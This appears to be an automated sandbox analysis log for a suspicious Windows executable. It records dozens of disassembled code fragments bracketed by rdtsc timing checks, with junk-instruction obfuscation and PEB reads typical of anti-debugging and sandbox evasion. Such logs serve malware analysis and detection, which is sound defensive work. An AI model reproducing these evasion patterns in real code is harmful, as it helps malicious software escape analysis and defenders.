Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FE0004 second address: FE0019 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F577C53EFCFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FE6FA0 second address: FE6FBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C5415D5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FE6FBB second address: FE7007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007F577C53EFC6h 0x0000000b popad 0x0000000c jmp 00007F577C53EFD6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F577C53EFD2h 0x0000001a jmp 00007F577C53EFD4h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA29F second address: FEA2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2A3 second address: FEA2A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2A7 second address: FEA2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F577C5415CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2B7 second address: FEA2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2BD second address: FEA2DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F577C5415D9h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2DD second address: FEA2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FF2F4E second address: FF2F5A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFB7D5 second address: FFB7E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F577C53EFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA0E4 second address: FFA0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA4F3 second address: FFA52E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F577C53EFDCh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F577C53EFD1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA6B7 second address: FFA6D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F577C5415C6h 0x00000008 jmp 00007F577C5415D7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA6D8 second address: FFA6EB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F577C53EFCEh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFAB37 second address: FFAB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F577C5415C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 10017A7 second address: 10017AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 10017AC second address: 10017C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 10017C0 second address: 10017D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCCh 0x00000009 jbe 00007F577C53EFC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 103C59B second address: 103C5B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F577C5415C6h 0x0000000f jng 00007F577C5415C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1043FA3 second address: 1043FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F577C53EFCFh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1043FBB second address: 1043FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F577C5415CCh 0x0000000e ja 00007F577C5415D2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1043FE2 second address: 1044008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F577C53EFCAh 0x0000000e jno 00007F577C53EFC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116523 second address: 111652B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111652B second address: 111653B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F577C53EFC6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11166AD second address: 11166D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F577C5415CAh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11166D3 second address: 11166D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11166D7 second address: 1116705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F577C5415D5h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jl 00007F577C5415CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116705 second address: 1116709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116A22 second address: 1116A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jmp 00007F577C5415CBh 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116A39 second address: 1116A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116BA4 second address: 1116BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CDh 0x00000007 jmp 00007F577C5415CAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F577C5415D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116BDA second address: 1116BE0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116D21 second address: 1116D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116D2D second address: 1116D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116E70 second address: 1116E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11188B9 second address: 11188BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111C73A second address: 111C73E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111C73E second address: 111C744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111CAD7 second address: 111CADD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111CADD second address: 111CAE2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111CD3C second address: 111CD81 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F577C5415CEh 0x00000017 nop 0x00000018 clc 0x00000019 push dword ptr [ebp+12A035BDh] 0x0000001f or dx, 2B31h 0x00000024 push FEAF09ECh 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007F577C5415CFh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E5ED second address: 111E60C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C53EFD9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E60C second address: 111E612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E612 second address: 111E625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E1A9 second address: 111E1AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E1AF second address: 111E1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E1B9 second address: 111E1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1120105 second address: 112010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 112010A second address: 1120112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1120112 second address: 1120116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743000B second address: 7430040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F577C5415D0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F577C5415CCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430040 second address: 7430045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430045 second address: 7430071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F577C5415CEh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx esi, dx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430071 second address: 74300B8 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 55ECh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov di, E4D8h 0x0000000c popad 0x0000000d mov eax, dword ptr fs:[00000030h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx eax, di 0x00000019 pushfd 0x0000001a jmp 00007F577C53EFD5h 0x0000001f sbb cx, A476h 0x00000024 jmp 00007F577C53EFD1h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74300B8 second address: 74300BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74300BD second address: 7430115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F577C53EFCDh 0x0000000a and ecx, 6F8795D6h 0x00000010 jmp 00007F577C53EFD1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d mov cl, 06h 0x0000001f mov bx, 130Ch 0x00000023 popad 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F577C53EFCDh 0x0000002e jmp 00007F577C53EFCBh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430115 second address: 743011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743011A second address: 7430211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C53EFD5h 0x00000009 sub cl, 00000046h 0x0000000c jmp 00007F577C53EFD1h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebx 0x0000001a jmp 00007F577C53EFCCh 0x0000001f mov ebx, dword ptr [eax+10h] 0x00000022 pushad 0x00000023 call 00007F577C53EFCEh 0x00000028 mov edx, eax 0x0000002a pop eax 0x0000002b jmp 00007F577C53EFD7h 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F577C53EFD2h 0x0000003a jmp 00007F577C53EFD5h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007F577C53EFD0h 0x00000046 sub cx, 8708h 0x0000004b jmp 00007F577C53EFCBh 0x00000050 popfd 0x00000051 popad 0x00000052 jmp 00007F577C53EFD8h 0x00000057 popad 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov edx, esi 0x0000005e call 00007F577C53EFD8h 0x00000063 pop ecx 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430211 second address: 743023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F577C5415D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743023F second address: 74302CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C53EFD2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [770206ECh] 0x00000011 pushad 0x00000012 mov al, 67h 0x00000014 mov di, 601Eh 0x00000018 popad 0x00000019 test esi, esi 0x0000001b jmp 00007F577C53EFD5h 0x00000020 jne 00007F577C53FF30h 0x00000026 jmp 00007F577C53EFCEh 0x0000002b xchg eax, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, 30AA0030h 0x00000034 pushfd 0x00000035 jmp 00007F577C53EFD9h 0x0000003a adc eax, 7162E7B6h 0x00000040 jmp 00007F577C53EFD1h 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74302CC second address: 74302DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74302DC second address: 74302E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74302E0 second address: 7430306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F577C5415CEh 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F577C5415CAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430306 second address: 743030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743030A second address: 7430310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430310 second address: 7430316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430316 second address: 743031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743031A second address: 74303BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [76FF0B60h] 0x0000000e mov eax, 7571E5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F577C53EFD2h 0x0000001b or ah, FFFFFF98h 0x0000001e jmp 00007F577C53EFCBh 0x00000023 popfd 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 movzx esi, bx 0x0000002a popad 0x0000002b popad 0x0000002c push 00000044h 0x0000002e jmp 00007F577C53EFD7h 0x00000033 pop edi 0x00000034 jmp 00007F577C53EFD6h 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov bx, si 0x0000003e mov cx, 1DE9h 0x00000042 popad 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 jmp 00007F577C53EFCEh 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e popad 0x0000004f xchg eax, edi 0x00000050 jmp 00007F577C53EFCEh 0x00000055 push dword ptr [eax] 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a mov ebx, 53660A00h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303BD second address: 74303C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303C2 second address: 74303C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303C8 second address: 74303CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303CC second address: 74303D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303D0 second address: 7430405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f mov ah, 58h 0x00000011 mov cx, di 0x00000014 popad 0x00000015 push dword ptr [eax+18h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F577C5415D9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430405 second address: 743040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743040B second address: 7430411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430439 second address: 7430456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430456 second address: 7430492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C5415D7h 0x00000008 jmp 00007F577C5415D8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov esi, eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430492 second address: 7430496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430496 second address: 743049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743049A second address: 74304D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F577C53EFD8h 0x0000000c sub ax, E758h 0x00000011 jmp 00007F577C53EFCBh 0x00000016 popfd 0x00000017 popad 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, E446h 0x00000021 push edi 0x00000022 pop eax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74304D7 second address: 7430508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 7315h 0x00000007 call 00007F577C5415D2h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F57EC0B077Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F577C5415CCh 0x0000001d rdtsc
